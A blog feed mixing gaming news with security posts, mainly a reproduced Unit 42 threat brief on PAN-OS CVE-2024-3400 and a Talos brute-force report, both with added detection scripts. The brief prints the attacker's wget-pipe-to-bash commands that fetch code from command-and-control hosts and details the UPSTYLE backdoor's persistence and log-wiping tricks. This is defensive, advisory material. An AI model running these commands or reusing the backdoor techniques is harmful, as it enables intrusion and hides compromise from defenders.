SeedTheNet
    Fat Princess, a quirky and beloved multiplayer action game released by Sony, has left a lasting impression on gamers since its debut. However, the game's discontinuation has sparked a wave of nostalgia and calls from fans for its revival.
    Originally released in 2009 for the PlayStation 3, Fat Princess quickly gained a dedicated following thanks to its unique blend of strategy, humor, and chaotic multiplayer battles. The game's premise, centered around rescuing a princess who can become harder to save as she consumes cake, delighted players and offered a refreshing take on the multiplayer genre.
    Despite its initial success and popularity, Fat Princess eventually faced the unfortunate fate of being discontinued by Sony. This decision left many fans disappointed and longing to revisit the whimsical world of cake-fueled warfare.
    Fans argue that a revival of Fat Princess would be well-received in today's gaming landscape, where multiplayer experiences and unique gameplay concepts continue to thrive. The game's lighthearted tone, strategic depth, and emphasis on teamwork could resonate with a wide audience, offering a refreshing alternative to more mainstream titles.
    Moreover, the advancements in online infrastructure and gaming platforms present an opportunity for Fat Princess to make a triumphant return with enhanced features, improved connectivity, and potential cross-platform play.
People have become sensitive to almost everything these days; would they also be sensitive to the game's name and its portrayal of overweight characters? Either way, what we want to see is another Fat Princess game!

Fat Princess can be played in RPCS3 for the nostalgia!

    SeedTheNet
    In January 2024, LittleBigPlanet 3 encountered persistent technical issues that led to the temporary shutdown of its servers for PS4. However, due to ongoing challenges, the decision has been made to keep the servers offline indefinitely. This means that all online services, including access to other players' creations, are no longer available.
    While this is undoubtedly disappointing news for the LittleBigPlanet 3 community, there are some important details to note. User-generated content (UGC) stored locally on your PS4 will still be accessible, allowing you to continue enjoying previously created content. However, any new UGC you create will be limited to local play on your PS4 and cannot be shared online.
    Despite the discontinuation of online services, offline features such as the campaign will remain fully playable. This ensures that players can still experience the core gameplay elements and enjoy the game's content independently of online connectivity.
    It's important for players to be aware of these changes and adjust their gameplay expectations accordingly. While the loss of online services is regrettable, LittleBigPlanet 3 still offers a rich single-player experience and access to locally stored user-generated content.
    The decision to keep the servers offline indefinitely reflects the challenges faced in maintaining online infrastructure and ensuring a stable and enjoyable experience for players. As the gaming landscape evolves, developers and publishers must make decisions that prioritize the long-term viability of their games while also considering the needs and expectations of their player base.
     
    https://www.playstation.com/en-us/legal/gameservers/

    SeedTheNet
    Cisco Talos, along with the Duo Security Research team, extends its gratitude to Brandon White, Phillip Schafer, Mike Moran, and Becca Lynch for their groundbreaking research that has uncovered a concerning trend in cyberattacks.
    Since March 18, 2024, Cisco Talos has been closely monitoring a significant rise in brute-force attacks targeting various entities globally. These attacks are directed towards Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, posing a serious threat to cybersecurity.
Notably, the attacks originate from TOR exit nodes as well as a range of other anonymizing tunnels and proxies. Routing the traffic through rotating anonymizing infrastructure hides the attackers' identities and makes simple per-IP blocking and attribution much less effective.
    The repercussions of successful attacks of this nature can be severe, ranging from unauthorized network access and account lockouts to potential denial-of-service (DoS) scenarios. As the frequency of these attacks continues to escalate, it's imperative for organizations to fortify their defenses and remain vigilant against evolving threats.
    While the list of known affected services includes VPN services, web authentication interfaces, and SSH services, it's crucial to note that these attacks may extend to other services as well. Organizations across various sectors must be proactive in implementing robust security measures to mitigate the risks posed by these brute-force attacks.
Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below; additional services may be impacted by these attacks.

Known affected services:
- Cisco Secure Firewall VPN
- Check Point VPN
- Fortinet VPN
- SonicWall VPN
- RD Web Services
- MikroTik
- DrayTek
- Ubiquiti

The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to:
- TOR
- VPN Gate
- IPIDEA Proxy
- BigMama Proxy
- Space Proxies
- Nexus Proxy
- Proxy Rack

Cisco Talos remains committed to monitoring and analyzing these threats, collaborating with industry experts, and providing timely insights and solutions to safeguard digital infrastructures against emerging cyber threats.
    https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
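The two credential patterns Talos describes (generic username lists hammered from one source, and organization-specific usernames tried from many proxy or TOR exit addresses) need two different detections, because a per-IP threshold alone never fires on the distributed case. The script below is an added example written for this post, not code from Cisco Talos; it runs over a handful of constructed OpenSSH auth.log lines (the hostname gw, the addresses, the usernames and the year 2024 are all assumptions) and raises a "burst" alert for a single source exceeding a sliding-window threshold and a "distributed" alert for a username attacked from several sources:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not real data; year assumed to be 2024).
# sshd logs "invalid user" when the account does not exist on the host.
SAMPLE_AUTH_LOG = """\
Apr 15 10:00:01 gw sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Apr 15 10:00:02 gw sshd[1202]: Failed password for root from 203.0.113.7 port 51023 ssh2
Apr 15 10:00:03 gw sshd[1203]: Failed password for invalid user test from 203.0.113.7 port 51024 ssh2
Apr 15 10:00:04 gw sshd[1204]: Failed password for invalid user user from 203.0.113.7 port 51025 ssh2
Apr 15 10:00:05 gw sshd[1205]: Failed password for invalid user guest from 203.0.113.7 port 51026 ssh2
Apr 15 10:01:10 gw sshd[1210]: Failed password for jsmith from 198.51.100.2 port 40001 ssh2
Apr 15 10:04:30 gw sshd[1211]: Failed password for jsmith from 198.51.100.3 port 40002 ssh2
Apr 15 10:09:45 gw sshd[1212]: Failed password for jsmith from 198.51.100.4 port 40003 ssh2
Apr 15 10:12:00 gw sshd[1220]: Failed password for alice from 192.0.2.9 port 52000 ssh2
Apr 15 10:12:05 gw sshd[1220]: Accepted password for alice from 192.0.2.9 port 52000 ssh2
"""

# Matches the sshd "Failed password" line; the "invalid user" prefix is optional.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Usernames typical of generic credential lists (assumed list; extend from your own data).
GENERIC_USERS = {"admin", "root", "test", "user", "guest", "ubuntu", "oracle", "pi"}

WINDOW_SECONDS = 60        # sliding window for the single-source burst check
BURST_THRESHOLD = 5        # failures from one source inside the window
DISTRIBUTED_THRESHOLD = 3  # distinct sources failing against the same username


def parse_failures(lines, year=2024):
    """Return (timestamp, username, source_ip) for each failed-password line."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if m:
            # syslog timestamps carry no year, so one is supplied by the caller
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
            events.append((ts, m["user"], m["ip"]))
    return events


def detect(lines):
    """Return alerts for single-source bursts and for usernames hit from many sources."""
    by_ip = defaultdict(list)
    sources_per_user = defaultdict(set)
    for ts, user, ip in parse_failures(lines):
        by_ip[ip].append((ts, user))
        sources_per_user[user].add(ip)

    alerts = []
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance start until events[start..end] all fall within WINDOW_SECONDS
            while (events[end][0] - events[start][0]).total_seconds() > WINDOW_SECONDS:
                start += 1
            if end - start + 1 >= BURST_THRESHOLD:
                users = {u for _, u in events[start:end + 1]}
                alerts.append({
                    "type": "burst",
                    "ip": ip,
                    "attempts": end - start + 1,
                    "users": sorted(users),
                    "generic_only": users <= GENERIC_USERS,
                })
                break  # one alert per source is enough
    # the distributed case: the same account tried from many addresses, each one below threshold
    for user, ips in sources_per_user.items():
        if len(ips) >= DISTRIBUTED_THRESHOLD:
            alerts.append({"type": "distributed", "user": user, "sources": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

On the sample the per-IP check flags 203.0.113.7 (five generic usernames in five seconds) while jsmith is only caught by the per-username view, since each of its three sources fails just once. In production, enrich the source addresses against a TOR exit-node list and the proxy providers named above before deciding on blocking, and remember that an account-lockout policy turns the distributed pattern into the denial-of-service outcome Talos warns about.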

    SeedTheNet
    In a surprising twist of events, the recent release of Amazon's highly anticipated Fallout TV show has reignited interest in the iconic Fallout game series. Fans old and new are diving back into the post-apocalyptic world, drawn by the show's captivating narrative and nostalgic allure.
    What sets the Fallout TV show apart is its faithful adaptation of the game universe, capturing the essence of the series and translating it into a compelling visual narrative. This authenticity has resonated with viewers, inspiring many to pick up the controller and experience the wasteland firsthand.
    For existing fans, the show serves as a nostalgic reminder of their adventures in the Fallout universe, while newcomers are intrigued by the unique blend of retro-futurism, dark humor, and moral dilemmas that define the games.
    The connection between the TV show and the games has created a symbiotic relationship, with each medium complementing the other to create a richer, more immersive experience. As discussions and excitement around Fallout continue to grow, the community is buzzing with theories, fan creations, and shared experiences.
    With the Fallout TV show acting as a catalyst, the games are once again in the spotlight, drawing in players old and new to explore the radioactive ruins, face off against mutated creatures, and navigate the complexities of a post-nuclear world.
Looking at SteamDB.info, Fallout 4 shows a gain of +139.0%, which brought in around 35k more players.
Fallout 3 saw a small jump.
Fallout 76 is up 124%, which is around 15k more players.

The Fallout 4 next-gen upgrade is slated for release on April 25.

    SeedTheNet
    When it comes to cybersecurity, staying ahead of the game is crucial. Palo Alto Networks, along with Unit 42, is actively monitoring and responding to the latest security challenges that could affect networks worldwide. One such challenge is the critical command injection vulnerability known as CVE-2024-3400, which poses a serious risk to users of Palo Alto Networks PAN-OS software.
    This article takes a closer look at CVE-2024-3400, emphasizing its severity with a CVSS score of 10.0
     
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
    Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.

    Required Configuration for Exposure
    This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
    You can verify whether you have a GlobalProtect gateway or GlobalProtect portal configured by checking for entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals) and verify whether you have device telemetry enabled by checking your firewall web interface (Device > Setup > Telemetry).
     
    Severity: CRITICAL
    CVSSv4.0 Base Score: 10 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/AU:Y/R:U/V:C/RE:M/U:Red)
    Exploitation Status
    Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability.
    More information about the vulnerability's exploitation in the wild can be found in the Unit 42 threat brief: https://unit42.paloaltonetworks.com/cve-2024-3400/.
    Weakness Type
    CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')
    Solution
    This issue will be fixed in hotfix releases of PAN-OS 10.2.9-h1 (ETA: By 4/14), PAN-OS 11.0.4-h1 (ETA: By 4/14), and PAN-OS 11.1.2-h3 (ETA: By 4/14), and in all later PAN-OS versions.
    Workarounds and Mitigations
    Recommended Mitigation: Customers with a Threat Prevention subscription can block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682).
    In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184 for more information.
    If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device.
    Please see the following page for details on how to temporarily disable device telemetry: https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/device-telemetry/device-telemetry-configure/device-telemetry-disable.
    Executive Summary
    Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
    A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
    This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with a GlobalProtect gateway and device telemetry enabled. This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access. For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue.

    Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor. We also assess that additional threat actors may attempt exploitation in the future.
    This threat brief will cover information about the vulnerability and what we know about post-exploitation. We will share interim guidance to mitigate the vulnerability, though readers should also refer to the security advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available.
    If you believe your firewall has been compromised, please reach out to Palo Alto Networks support.
    This issue will be fixed in an upcoming release of PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1 and all later PAN-OS versions by ETA April 14, 2024.
    As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity.
    We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.
    Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:
    Palo Alto Networks recommends customers with a Threat Prevention subscription block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information.
    If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device.
    The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE.
    The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
Vulnerabilities Discussed: CVE-2024-3400
Table of Contents
    Details of the Vulnerability
    Current Scope of the Attack
    Interim Guidance
    Unit 42 Managed Threat Hunting Queries
    Conclusion
    Palo Alto Networks Product Protections for CVE-2024-3400
    Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention
    Cortex XDR, XSIAM and the Unified Cloud Agent
    Cortex Xpanse and XSIAM ASM Module
    Indicators of Compromise
    UPSTYLE Backdoor
    Command and Control Infrastructure
    Hosted Python Backdoor
    Observed Commands
    Additional Resources
    Details of the Vulnerability
    A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with both a GlobalProtect gateway and device telemetry enabled.
    You can verify whether you have these features configured by checking for entries in your firewall web interface. Our security advisory includes a link to further instructions on how to temporarily disable device telemetry.
    Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.
    Current Scope of the Attack
    As part of the activity observed in Operation MidnightEclipse, after exploitation, the threat actor created a cronjob that would run every minute to access commands hosted on an external server that would execute via bash, as seen in the following command:
wget -qO- hxxp://172.233.228[.]93/policy | bash

We were unable to access the commands executed via this URL. However, we believe this URL was used to deploy a second Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE.
    The UPSTYLE backdoor uploaded to the firewall was hosted at hxxp://144.172.79[.]92/update.py, but we saw a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, it appears the threat actor last modified it on April 7, 2024.
Accept-Ranges: bytes
Content-Length: 5187
Content-Type: application/octet-stream
Date: Thu, 11 Apr 2024 16:12:16 GMT
Etag: "6612443d-1443"
Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT
Server: nginx/1.18.0 (Ubuntu)

The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.
First, update.py writes another Python script to the following location:

[snip]/site-packages/system.pth

The Python script written to system.pth Base64 decodes an embedded Python script and executes it. (A .pth file under site-packages is processed by Python's site module at interpreter startup, and any line in it beginning with "import" is executed, so code planted there runs whenever a Python process starts on the device; that is what makes this location useful for persistence.) This embedded Python script has two functions named protect and check, which are called in that order. The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function reads /proc/self/cmdline to see if it is running as monitor mp before running another Base64-embedded Python script, which is the functional backdoor.

The Python script run by system.pth has a function named __main that runs in a thread. This function first reads the contents of the following file, along with its access and modified times:

[snip]/css/bootstrap.min.css

It then enters an infinite loop that iterates once every two seconds, reading in the following file:

[snip]/sslvpn_ngx_error.log

The script iterates through each line of the file and searches the line for the threat actor's command using the following regular expression:

img\[([a-zA-Z0-9+/=]+)\]

If the regular expression matches, the script Base64 decodes the captured group to recover the command and runs it using the popen method within Python's os module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which prunes the lines containing commands so that they are not available in sslvpn_ngx_error.log for later analysis.

After running the command, the script writes the output of the command to the following file:

[snip]/css/bootstrap.min.css

The script then creates another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds, writes the original contents back to the file and sets the access and modified times to their original values. The point of this function is to avoid leaving the output of the commands available for analysis. It also suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.

Using the initial backdoor in the crontab, we have evidence of a handful of the commands the threat actor ran on the firewall. The commands include copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor:

66.235.168[.]222

We also observed the threat actor running another command to receive commands from a slightly different URL than the cronjob backdoor:

wget -qO- hxxp://172.233.228[.]93/patch|bash

Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs.
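The command channel described above is simple enough that a defender can hunt for it directly: any line in sslvpn_ngx_error.log (or a copy of it from a tech-support bundle) carrying the img[<base64>] marker, and any crontab entry that fetches a URL with wget and pipes it into bash. The script below is an added example written for this post, not Unit 42's code or the backdoor itself. It runs over constructed log and crontab lines (the nginx-style prefixes and the decoded commands id and uname -a are made up for the sample); the indicator addresses are the ones listed in the brief, written undefanged because that is how they appear in real logs.

```python
import base64
import re
from urllib.parse import urlparse

# Command marker the backdoor searches for in sslvpn_ngx_error.log (regex from the analysis above).
CMD_RE = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")

# Loader shape seen in the actor's cronjob: wget -qO- <url> | bash (also matches "|sh").
LOADER_RE = re.compile(r"wget\s+-qO-\s+(\S+)\s*\|\s*(?:ba)?sh\b")

# Network indicators from the brief, undefanged so they match what logs actually contain.
KNOWN_IOC_HOSTS = {
    "172.233.228.93",
    "66.235.168.222",
    "144.172.79.92",
    "nhdata.s3-us-west-2.amazonaws.com",
}

# Constructed sample lines (not real captures); the last marker is deliberately not valid base64.
SAMPLE_ERROR_LOG = [
    "2024/04/10 12:00:00 [error] 1234#0: *1 upstream timed out while reading response header",
    "2024/04/10 12:00:01 [error] 1234#0: *2 img[aWQ=] in request",
    "2024/04/10 12:00:02 [error] 1234#0: *3 img[dW5hbWUgLWE=] in request",
    "2024/04/10 12:00:03 [error] 1234#0: *4 img[abc] in request",
]
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "* * * * * wget -qO- http://172.233.228.93/policy | bash",
]


def find_embedded_commands(log_lines):
    """Return every img[...] marker with its base64-decoded command (None if not decodable)."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        for m in CMD_RE.finditer(line):
            token = m.group(1)
            try:
                command = base64.b64decode(token, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: bad length or padding
                command = None
            hits.append({"line": lineno, "token": token, "command": command})
    return hits


def find_loaders(lines):
    """Flag wget-pipe-to-shell loaders and say whether the fetched host is a known indicator."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOADER_RE.search(line)
        if not m:
            continue
        url = m.group(1)
        host = urlparse(url).hostname or ""
        findings.append({
            "line": lineno,
            "url": url,
            "host": host,
            "known_ioc": host in KNOWN_IOC_HOSTS,
        })
    return findings


if __name__ == "__main__":
    for hit in find_embedded_commands(SAMPLE_ERROR_LOG):
        print("command marker on line %d: %r" % (hit["line"], hit["command"]))
    for f in find_loaders(SAMPLE_CRONTAB):
        print("loader on line %d -> %s (known IOC: %s)" % (f["line"], f["host"], f["known_ioc"]))
```

Two caveats follow from the analysis itself. The backdoor rewrites sslvpn_ngx_error.log without the matching lines and restores bootstrap.min.css after 15 seconds, so an empty result on a live device is not evidence of absence; hunt in log copies shipped off the box, and treat a wget-pipe-to-shell crontab entry as suspicious even when the host is not in the indicator list, since the actor can change infrastructure far faster than the list is updated.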
    Interim Guidance
    Please refer to the Palo Alto Networks security advisory on CVE-2024-3400 for the most current interim guidance for mitigating the vulnerability.
    Unit 42 Managed Threat Hunting Queries
    The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.
// Description: Search for domain IOC in raw NGFW logs
dataset = panw_ngfw_url_raw
| filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com"
| fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid

// Description: Detect hits for the specific prevention signature for CVE-2024-3400
config case_sensitive = false
| dataset = panw_ngfw_threat_raw
| filter threat_id = "95187"
| fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, *

// Description: Hits for known IOCs in NGFW traffic
config case_sensitive = false
| dataset = panw_ngfw_traffic_raw
| filter source_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") or dest_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93")
| fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason

// Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW)
config case_sensitive = false
| dataset = xdr_data
| filter event_type = ENUM.STORY
| filter action_remote_ip in ("172.233.228.93", "66.235.168.222", "144.172.79.92") OR dns_query_name ~= ".nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~= ".nhdata.s3-us-west-2.amazonaws.com"
| fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname
    Conclusion
    The security advisory will continue to provide up to date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation.
    Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.
    Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
    Protections and mitigations for the observed exploitation activity are below and will be updated as more become available.
    Palo Alto Networks Product Protections for CVE-2024-3400
    Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.
    If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:
North America Toll-Free: 866.486.4842 (866.4.UNIT42)
EMEA: +31.20.299.3130
APAC: +65.6983.8730
Japan: +81.50.1790.0200

Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention
    Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signature: 95187.
    Cortex XDR, XSIAM and the Unified Cloud Agent 
    Cortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to enumerate or laterally move to other assets.
    Cortex Xpanse and XSIAM ASM Module
    Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.
    Indicators of Compromise
    UPSTYLE Backdoor
update.py (SHA256):
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure
172.233.228[.]93
hxxp://172.233.228[.]93/policy
hxxp://172.233.228[.]93/patch
66.235.168[.]222

Hosted Python Backdoor
144.172.79[.]92
nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands
wget -qO- hxxp://172.233.228[.]93/patch|bash
wget -qO- hxxp://172.233.228[.]93/policy | bash

Additional Resources
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway – Palo Alto Networks
Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) – Volexity
Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and Infrastructure Security Agency (CISA)

Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources.
    Updated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.
    UPDATE :
Unfortunately, Palo Alto Networks has since updated the advisory to warn that one of the previously shared mitigations has been found to be ineffective at protecting devices from the vulnerability.
"In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation," reads the update to Palo Alto's advisory.
"Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability."
In other words, the telemetry workaround quoted earlier in this post no longer applies: any PAN-OS 10.2, 11.0 or 11.1 firewall with a GlobalProtect gateway or portal should be treated as exposed regardless of its telemetry setting. The only real fix is to install the hotfix release (PAN-OS 10.2.9-h1, 11.0.4-h1 or 11.1.2-h3, or a later version) as soon as possible.
Until the upgrade is done, customers with an active Threat Prevention subscription can block ongoing attacks by enabling Threat ID 95187 and making sure vulnerability protection is applied to the GlobalProtect interface; a device that was exposed before the signature was in place should still be checked for the indicators above, since patching does not remove an existing backdoor.
    https://unit42.paloaltonetworks.com/cve-2024-3400/

    SeedTheNet
    We are pleased to inform you that Fortinet has released the latest update for FortiOS 7.0, version 7.0.15. This update brings a range of enhancements, optimizations, and security updates to further strengthen your network infrastructure's resilience and performance.
    Key highlights of the FortiOS 7.0.15 update include:
Resolved issues

The following issues have been fixed in version 7.0.15. To inquire about a particular bug, please contact Customer Service & Support.

Application Control
952307: FG-400F sees increased packet loss when using an application list in the policy.

FortiGate 6000 and 7000 platforms
949175: During FIM failover from FIM2 to FIM1, the NP7 PLE sticks on a cache invalidation, stopping traffic.

HA
869557: Upgrading or re-uploading an image to the HA secondary node causes the OS to be un-certified.
1011674: Upgrading from 7.0.14 GA to 7.2.8 GA from an HA secondary node fails with BIOS security level 2. The new image is unrecognized as un-certified and aborts the upgrade process. The HA cluster is unaffected.

Hyperscale
936747: Connections per second (CPS) performance of SIP sessions accepted by hyperscale firewall policies with EIM and EIF disabled that include overload with port block allocation (PBA) GCN IP pools is lower than expected.
949188: ICMP reply packets are dropped by FortiOS in a NAT64 hyperscale policy.
961684: When DoS policies are used and the system is under stress conditions, BGP might go down.
976972: New primary can get stuck on failover with HTTP CC sessions.

Intrusion Prevention
968367: IPS engine high memory usage can cause FortiOS to go into conserve mode.

Limitations
961992: The buffer and description queue limitation of Marvell switch ports causes a performance limitation.

Routing
935370: SD-WAN performance SLA tcp-connect probes clash with user sessions.

Security Fabric
887967: Fabric crashes when synchronizing objects with names longer than 64 characters.
988526: Address object changes from the CLI of the root FortiGate in Security Fabric are not synchronized with downstream devices.

SSL VPN
821240: SSLVPNVD 11 signal failure due to attempt to read out of bounds memory.

System
828557: FortiGate as DHCP relay is not showing a DHCP decline in the debugs when there is an IP conflict in the network.
888941: Some sessions are still reported as offloaded when auto-asic-offload is disabled.
910829: Degraded traffic bandwidth for download passing from 10G to 1G interfaces.
937500, 969083: FortiOS does not accept an installation script from FortiManager when creating an extender-profile with login-password-change set to yes.
938449: In the 4.19 kernel, when a neighbor's MAC is changed, the session and IPsec tunnel cannot be flushed from the NPU.
943090: Buffer and description queue limitation of Marvell switch port will cause a performance limitation.
949481: The tx_collision_err counter in the FortiOS CLI keeps increasing on both 10G SFP+ X1 and X2 interfaces.
956107: On the FortiGate 400F and 600F, the buffer and description queue limitation of the Marvell switch port causes a performance limitation.
984696: Network usage is not accurately reported by the get system performance status command.
986698: The NP7 should use the updated MAC address from the ARP table to forward traffic to the destination server.
1001938: Support Kazakhstan time zone change to a single time zone, UTC+5.

User & Authentication
1000108: Guest-management administrators cannot see or print guest user passwords in plain text; the password is masked as an ENC XXXX string.

WiFi Controller
821320: FG-1800F drops wireless client traffic in L2 tunneled VLAN with capwap-offload enabled.

We strongly recommend applying this update to your Fortinet devices to benefit from the latest fixes, security enhancements, and performance optimizations. Note that the list is not purely cosmetic: bug 821240 is an out-of-bounds memory read in the SSL VPN daemon, so devices with an internet-facing SSL VPN portal should be prioritized. Keeping your systems up to date is crucial in maintaining a secure and efficient network environment.
For more information about the upgrade path, release notes, and support resources, please visit the Fortinet Support Portal or reach out to Fortinet's dedicated support team for assistance.

    SeedTheNet
